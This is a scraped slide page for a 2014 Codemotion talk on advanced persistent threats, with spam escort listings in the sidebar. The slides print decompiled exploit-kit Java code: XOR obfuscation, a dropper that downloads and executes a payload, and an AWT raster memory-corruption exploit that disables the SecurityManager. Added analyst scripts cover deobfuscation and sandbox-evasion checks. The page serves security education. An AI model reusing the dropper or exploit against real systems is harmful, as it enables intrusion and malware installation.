Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
 

Último

🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 

Último (20)

🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 

The magic world of APT 0.6 - Pompili

  • 1. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't apompili@hotmail.com
  • 2. Attacker Zovi) http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
  • 3. How does an attack unfold? <#1> <#2> <#3>
  • 4. <1996> The Dark Side of the Moon http://vx.org.ua/29a/main.html
  • 5. rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines <2000> 8.7 billion dollars
  • 6. <2001> The Nimda Style
        > Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
        > Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
        > Microsoft IE MIME Header Attachment Execution Vulnerability
        > TFTP Server UDP:69
        > RICHED20.DLL Microsoft Office 2000 DLL Execution Vulnerability
        > Microsoft IE MIME Header Attachment Execution Vulnerability
        635 million dollars
  • 7. SQL Server 2000 Desktop Engine: 75,000 computers infected in just 10 minutes; a payload of only 376 bytes (memory-resident only); 1.2 billion dollars
  • 8. 22.6 billion dollars; DDoS against www.sco.com; Upload & Execute 0x85 0x13 0x3c 0x9e 0xa2; Backdoor TCP 3127-3198; http://echohacker.altervista.org/articoli/mydoom.html
  • 9. <2010-2012> Government in Action > Stuxnet (2010) > Duqu (2011) > Flame (2012) > Gauss (2012) Shopping For Zero-Days http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
  • 10. The most complex malware in history > 20MB in size (900Kb main program/dropper + 16 modules detected to date) > 80 domains used as Command and Control systems > Spread via USB stick (Infectmedia) > Bluetooth device enumeration (Beetlejuice) > Audio recording (Microbe) > Windows Update MITM (Munch & Gadget) MD5 Collision Attack
  • 11. <2007> Storm Worm & CyberCrime Market http://www.pcworld.com/article/138694/article.html
  • 12. http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/
  • 13. Advanced Persistent Threats 101 > Trust Exploitation Social Engineering Spear Phishing Botnet Drive-to-Click Strategy
  • 14. > Trust Exploitation > Client Exploitation Exploit Pack (e.g. Neutrino) 0-Day Advanced Persistent Threats 101
  • 15. > Trust Exploitation > Client Exploitation > Multi-Stage Shellcoding Dropper/Downloader Modules (e.g. RAT, Infostealer, etc.) Good Covert Channel Advanced Persistent Threats 101
  • 16. > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector Email WebSites Botnet Physical (USB) Advanced Persistent Threats 101
  • 17. > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector > Resiliency Camouflaging Command & Control Good Covert Channel Advanced Persistent Threats 101
  • 18. Make or Buy?
  • 19. The Botnet Choice
  • 20. Drive-to-Click <#1>
  • 21. Drive-to-Click <#2>
  • 22. Drive-to-Click <#3>
  • 23. Drive-to-Click <#4>
  • 24. Drive-to-Click <#5>
  • 25. Trick#1> Let's play with extensions: RLO Unicode control character
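As an added example (not from the talk), a check a mail gateway or an analyst could run on attachment names to surface the RLO trick from this slide: it lists the bidirectional control characters present and compares the extension a user would see with the one the OS will actually use. The file name in the sample is constructed.

```python
import unicodedata

# Unicode bidi embedding/override/isolate controls. U+202E (RLO) is the one
# the trick relies on; the others are included because they are invisible
# and cause the same rendering ambiguity.
BIDI_CONTROLS = {
    "\u202A", "\u202B", "\u202C", "\u202D", "\u202E",
    "\u2066", "\u2067", "\u2068", "\u2069",
}


def real_extension(name: str) -> str:
    """Extension the OS uses: text after the last '.' in the raw string."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def displayed_name(name: str) -> str:
    """Approximate what a left-to-right UI renders: text after an RLO
    (U+202E) is shown reversed until a PDF (U+202C) or the end of the
    string; the other bidi controls are simply not drawn."""
    out = []
    i = 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202E":
            j = i + 1
            while j < len(name) and name[j] != "\u202C":
                j += 1
            out.append(name[i + 1:j][::-1])
            i = j + 1
            continue
        if ch not in BIDI_CONTROLS:
            out.append(ch)
        i += 1
    return "".join(out)


def check_filename(name: str) -> dict:
    """Report the shown vs. real extension and flag a mismatch caused by
    bidi controls as suspicious."""
    shown = displayed_name(name)
    controls = sorted(
        unicodedata.name(c, "U+%04X" % ord(c)) for c in set(name) if c in BIDI_CONTROLS
    )
    return {
        "displayed": shown,
        "displayed_extension": real_extension(shown),
        "real_extension": real_extension(name),
        "bidi_controls": controls,
        "suspicious": bool(controls) and real_extension(shown) != real_extension(name),
    }


if __name__ == "__main__":
    # Constructed sample: renders as "invoice_2014exe.pdf" but is an .exe
    print(check_filename("invoice_2014\u202Efdp.exe"))
```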
  • 26. Trick#2> Content-Disposition Nightmare http://www.gnucitizen.org/blog/content-disposition-hacking/ Download Server Response Headers RFC 2616
  • 27. Trick#3> Client Exploiting
        <applet codebase="http://blahblah.evilsite.in/hiddenpath/"
                archive="http://blahblah.othersite.in/hiddenpath/c8c34734f41cca863a972129369060d9"
                code="rgmiv">
  • 28.
        // decompiled exploit-kit applet: the random class names and the
        // dead string assignments are junk inserted to defeat signatures
        public class xp extends JApplet {
            public void init() {
                try {
                    Object aobj[] = new Object[0];
                    Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1);
                    String s = "hpjwbludyi";
                    s = "wgpxrwyvzolbb";
                    s = "zdfmvftloqmakqysyu";
                    s = "nrrkqnjfylgtljyyferr";
                    cr.hzumfnc(obj);
                    Object aobj1[] = new Object[0];
                    String s1 = "ofvszonrzgelnko";
                    s1 = "fefhtspcqhj";
                    s1 = "evztavmzjarjgwu";
                    Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] { Integer.TYPE })
                            .newInstance(new Object[] { Integer.valueOf(tcbteokd.mdrikbua(9)) });
                    int ai[] = new int[8];
                    Object aobj2[] = new Object[7];
                    aobj2[2] = cr.hzumfnc(obj);
                    ...
• 29. <01> XOR String Encryption (Malware)
    public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7");
    ...
    // "decrypt": apply idzfihff to every character
    public static String n(String s) {
        String s1 = "";
        for (int i = 0; i < s.length(); i++)
            s1 += idzfihff(s.charAt(i));
        return s1;
    }
    ...
    // the whole cipher is a one-byte XOR with the constant 0x5b
    public static char idzfihff(char c) {
        return (char)(c ^ 0x5b);
    }
  https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
• 30. <02> Java Reflection (Malware)
    // class lookup by (decrypted) name: no class reference survives in the constant pool
    public static Class fuss(String s) throws Exception {
        return Class.forName(s);
    }
    ...
    // method call and constructor lookup, again by name only
    public static Object dngfuv(Method method, Object obj, Object aobj[]) throws Exception {
        return method.invoke(obj, aobj);
    }
    public static Constructor bjixqh(Class class1, Class aclass[]) throws Exception {
        return class1.getConstructor(aclass);
    }
    ...
  https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
• 31. <03> ClassLoader Override (Malware)
    class t extends ClassLoader {
        public static void ujrzjw(t t1, String s) {
            try {
                // defineClass() turns a byte array carried in a static field into a live class
                // (named "qbw" here), so the second-stage class never exists as a file in the jar
                Class class1 = t1.defineClass("qbw", tcbteokd.xcpoalaefqfvuacylvakyi,
                        0, tcbteokd.xcpoalaefqfvuacylvakyi.length);
                // ... and its String constructor is invoked reflectively to start it
                ygigtele.bjixqh(class1, new Class[] { tcbteokd.fuss("java.lang.String") })
                        .newInstance(new Object[] { s });
            } catch (Exception ex) {
                System.exit(0);
            }
        }
    }
• 32. The Dropper Class
    ...
    private static void lcsqyrgtbct(String s, int i) {
        // download URL = base string + numeric suffix
        String s1 = s + Integer.valueOf(i);
        ...
        rchannel = Channels.newChannel((new URL(s1)).openStream());
        ...
        // the downloaded bytes are XORed with 0x29 and written to a temp file
        File file = File.createTempFile("~tmf", null);
        FileOutputStream fos = new FileOutputStream(file);
        for (int j = 0; j < abyte0.length; j++)
            abyte0[j] = (byte)(abyte0[j] ^ 0x29);
        fos.write(abyte0);
        // size check against an empty or error response, then run it:
        // cmd.exe on Windows, ProcessBuilder as the fallback when cmd.exe is not there
        if (abyte0.length > 1024)
            try {
                Runtime.getRuntime().exec(new String[] { "cmd.exe", "/C", file.getAbsolutePath() });
            } catch (IOException ioe) {
                (new ProcessBuilder(new String[] { file.getAbsolutePath() })).start();
            }
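Analyst-side tooling for slides 29 to 32, added here as an example and not part of the talk or of the sample: a single-byte XOR is fixed by one known plaintext byte, so a crib (`java.` for class names, `MZ` for the dropped executable) recovers the key without running the applet. The decompiled source and the "captured" payload below are constructed for the example; `ha.n` is the decrypt helper's name from slide 29, and the `\uXXXX` handling exists because XORing a class name with 0x5b turns its capital letters into control characters that a decompiler prints as Java escapes.

```python
import re

# The decrypt helper on the slide is ha.n(...); the regex captures its argument, Java escapes included.
STRING_CALL = re.compile(r'ha\.n\("((?:[^"\\]|\\.)*)"\)')


def xor_bytes(data, key):
    """The whole cipher: every byte XORed with one constant (0x5b for strings, 0x29 for the payload)."""
    return bytes(b ^ key for b in data)


def recover_xor_key(data, crib, offset=0):
    """One known plaintext byte fixes a one-byte key; the rest of the crib verifies it.
    Returns the key, or None if the crib does not fit at that offset."""
    if len(data) < offset + len(crib):
        return None
    key = data[offset] ^ crib[0]
    return key if xor_bytes(data[offset:offset + len(crib)], key) == crib else None


def is_printable_ascii(data):
    return all(0x20 <= b < 0x7f for b in data)


def obfuscate_literal(plain, key):
    """Attacker side, constructed for this example: the Java literal a plaintext turns into.
    Bytes that are not printable, or would break the literal, become \\uXXXX escapes."""
    out = []
    for b in xor_bytes(plain.encode("ascii"), key):
        out.append(chr(b) if 0x20 <= b < 0x7f and b not in (0x22, 0x5c) else "\\u%04x" % b)
    return "".join(out)


def find_literals(source):
    """Raw bytes of every argument passed to the decrypt helper in a decompiled source."""
    return [m.encode("latin-1").decode("unicode_escape").encode("latin-1")
            for m in STRING_CALL.findall(source)]


def guess_key(literals, crib=b"java."):
    """Try the crib first (fully qualified class names start with 'java.'); otherwise pick
    the key under which the most literals decode to printable ASCII."""
    for lit in literals:
        key = recover_xor_key(lit, crib)
        if key is not None:
            return key
    return max(range(256), key=lambda k: sum(is_printable_ascii(xor_bytes(l, k)) for l in literals))


def deobfuscate_source(source, key):
    """Rewrite every ha.n("...") call into the plain string it decrypts to."""
    def repl(m):
        raw = m.group(1).encode("latin-1").decode("unicode_escape").encode("latin-1")
        return '"%s"' % xor_bytes(raw, key).decode("ascii", "replace")
    return STRING_CALL.sub(repl, source)


def recover_dropped_payload(blob):
    """Dropper side: the download is XORed with one byte before being written and executed.
    Recover the key from the 'MZ' header and confirm it with the DOS stub text.
    Returns (key, plaintext) or (None, None)."""
    key = recover_xor_key(blob, b"MZ")
    if key is None:
        return None, None
    plain = xor_bytes(blob, key)
    return (key, plain) if b"This program cannot be run in DOS mode" in plain else (None, None)


# Constructed sample inputs (not taken from the slides).
KEY = 0x5b
PLAIN_STRINGS = ["java.lang.Runtime", "setSecurityManager", "cmd.exe"]
SAMPLE_SOURCE = "\n".join('public static String s%d = ha.n("%s");' % (i, obfuscate_literal(p, KEY))
                          for i, p in enumerate(PLAIN_STRINGS))
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode.\r\n$" + b"\x00" * 16
CAPTURED = xor_bytes(FAKE_PE, 0x29)       # what a proxy log or pcap would hold

if __name__ == "__main__":
    literals = find_literals(SAMPLE_SOURCE)
    key = guess_key(literals)
    print("string key: 0x%02x" % key)
    print(deobfuscate_source(SAMPLE_SOURCE, key))
    pkey, pe = recover_dropped_payload(CAPTURED)
    print("payload key: 0x%02x, header %r" % (pkey, pe[:2]))
```

Applied to the slide's own literal, `xor_bytes(b"1:-:u:,/u26:<>u", 0x5b)` gives `java.awt.image.`, which is how the key can be confirmed from a single string without touching the rest of the code.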
• 33. The Malware Core
  http://valhalla.allalla.com/2013/08/java-netbeans-applet-integer-overflow-win32-target-added/
    // the privileged call the exploit ultimately wants: System.setSecurityManager(null)
    Object obj1 = new java.awt.image.DataBufferByte(9);
    int[] ai = new int[8];
    Object[] oo = new Object[7];
    oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
    ...
    // source raster: an 8-byte buffer filled with 0xff
    DataBufferByte obj5 = new DataBufferByte(8);
    for (int j = 0; j < 8; j++)
        obj5.setElem(j, -1);
    MultiPixelPackedSampleModel obj6 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 1, 1, 4, 0);
    Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);
    // destination raster: the 9-byte buffer above, described by a sample model whose scanline
    // stride (0x3fffffdd) and data bit offset (288) are far larger than the buffer; the two
    // constants are adjusted by a boolean flag (tcbteokd.pi) that the sample sets elsewhere
    MultiPixelPackedSampleModel obj8 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 2, 1,
            0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0));
    Raster obj9 = Raster.createWritableRaster(obj8, obj1, null);
    byte[] obj10 = new byte[] { 0, -1 };
    IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10);
    CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null);
    // the native compose trusts the sample model's geometry: this is where the out-of-bounds write lands
    obj12.compose(obj7, obj9, obj9);
• 34. The Cheaper Path to Exploiting
  Blackhole Exploit Kit http://en.wikipedia.org/wiki/Blackhole_exploit_kit
  Styx Exploit Pack http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto
  Neutrino http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html
  RedKit http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
• 35. The InfoStealer Choice
• 36. The RAT Choice
• 37. Bitcoin + APT = Ransomware
• 38. The Command&Control Choice <#1>
• 39. The Command&Control Choice <#2>
• 40. The Command&Control Choice <#3>
• 41. The Command&Control Choice <#4>
• 42. <2012> The Antivirus Maker Confession
  "The truth is, consumer-grade antivirus products can't protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose"
  Mikko Hyppönen (F-Secure)
• 43. The Way to Sandboxing
• 44. The Way to Sandboxing
  <01> USER-MODE AGENT: software component in a guest operating system (keylogger)
  <02> KERNEL-MODE PATCHING: guest operating system kernel modified for tracing (rootkit)
  <03> VIRTUAL MACHINE MONITORING: customized hypervisor to monitor the guest operating system
  <04> SYSTEM EMULATION: hardware emulator to hook appropriate memory, IO functions, peripherals, etc.
  <05> KERNEL EMULATION: kernel emulator to hook appropriate system calls, etc.
• 45. A (very) partial list of the Players
  > Norman Sandbox (Norway 2001)
  > FireEye (US 2004)
  > Damballa (US 2006)
  > Lastline/Anubis/Wepawet (Austria 2006)
  > Sandboxie (2006)
  > Cuckoo Sandbox (2010)
  > VMRay formerly CWSandbox (Germany 2007)
  > Joe Security LLC (Switzerland 2007)
  > BitBlaze (2008)
  > ThreatExpert (Ireland 2008)
  > Ether (US 2009)
• 47. A (completely) partial list of the Evaders
• 48. Evading Sandbox 4 Dummies
  > Human Interaction (UpClicker, December 2012)
  > MessageBox (something that needs to be clicked)
  > Sleep Calls (Trojan Nap, uncovered in February 2013)
  > Time Triggers (Hastati, March 2013: a massive, data-destroying attack in South Korea)
  > Check Internet Connection
  > Check Volume information and Size
  > Check self Executable name
  > Execution after reboot
  > Check System services, files and communication ports
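The "Sleep Calls" and "Time Triggers" bullets from the sample's point of view, as an added Python example (not code from the talk, and nothing here is taken from Trojan Nap or Hastati): the sample asks for a delay and then reads two independent clocks. A sandbox that stubs the sleep out makes the delay vanish; one that bumps a single clock leaves the two disagreeing; only a sandbox that skips the wait and advances every readable time source by the same amount (`VirtualClock`, assumed here as the sandbox's counter-measure) passes the check. The clock classes are constructed stand-ins for the Windows calls a real sample would use (Sleep, GetTickCount, QueryPerformanceCounter).

```python
import time


def sleep_is_honored(sleep_fn, seconds, clocks=(time.monotonic, time.perf_counter), tolerance=0.5):
    """Sample-side evasion check: request a delay, then verify on two independent clocks that
    at least `tolerance` of it elapsed and that the clocks agree with each other."""
    before = [clock() for clock in clocks]
    sleep_fn(seconds)
    elapsed = [clock() - t0 for clock, t0 in zip(clocks, before)]
    enough = all(e >= seconds * tolerance for e in elapsed)
    agree = max(elapsed) - min(elapsed) <= seconds * tolerance
    return enough and agree


def naive_skip(seconds):
    """Naive sandbox hook: return at once so a ten-minute nap costs no analysis time.
    Detected: nothing elapses on either clock."""
    return None


class VirtualClock:
    """Sandbox counter-measure (assumed, not from the talk): still skip the real wait, but
    advance every clock the sample can read by the requested amount."""

    def __init__(self, start=1000.0):
        self.now = start

    def sleep(self, seconds):
        self.now += seconds

    def monotonic(self):
        return self.now

    def perf_counter(self):
        return self.now + 0.25            # different epoch, same rate, as on a real host


class BumpedTickCount(VirtualClock):
    """Half-done counter-measure: the skipped time is added to one clock only.
    Detected: the second clock shows that nothing happened."""

    def perf_counter(self):
        return 5000.0                     # never moves


def classify(sleep_fn, clocks, seconds=600):
    """Convenience wrapper returning the verdict a sample would act on."""
    return "host" if sleep_is_honored(sleep_fn, seconds, clocks) else "sandbox"


if __name__ == "__main__":
    print("real sleep   :", classify(time.sleep, (time.monotonic, time.perf_counter), seconds=0.05))
    print("stubbed sleep:", classify(naive_skip, (time.monotonic, time.perf_counter), seconds=0.05))
    vc, bc = VirtualClock(), BumpedTickCount()
    print("virtual clock:", classify(vc.sleep, (vc.monotonic, vc.perf_counter)))
    print("bumped tick  :", classify(bc.sleep, (bc.monotonic, bc.perf_counter)))
```

The point for the defender is the last two lines: skipping sleeps is cheap, but it only stays invisible if every time source the guest can query (tick count, performance counter, RTC, even NTP responses) moves together.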
• 49. The limit of Sandboxes: Minutes
  def: Patient Zero is the first patient identified in the population sample of an epidemiological investigation…
• 50. Certainly better than trusting the users
• 51. Questions?
  Domande? (Italian) | أيّة مطالب (Arabic) | ¿Preguntas? (Spanish) | Questions? (English) | tupoQghachmey (Klingon) | Sindarin | Japanese | Ερωτήσεις? (Greek) | вопросы? (Russian)